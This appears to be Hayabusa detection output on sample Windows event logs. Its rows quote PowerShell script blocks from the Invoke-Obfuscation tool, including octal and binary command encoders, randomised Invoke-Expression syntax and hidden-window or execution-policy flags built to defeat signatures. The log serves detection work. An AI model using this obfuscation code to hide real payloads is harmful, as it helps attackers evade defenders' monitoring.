The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. 
$DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. 
$RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. 
$EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. 
$SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. 
# These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: 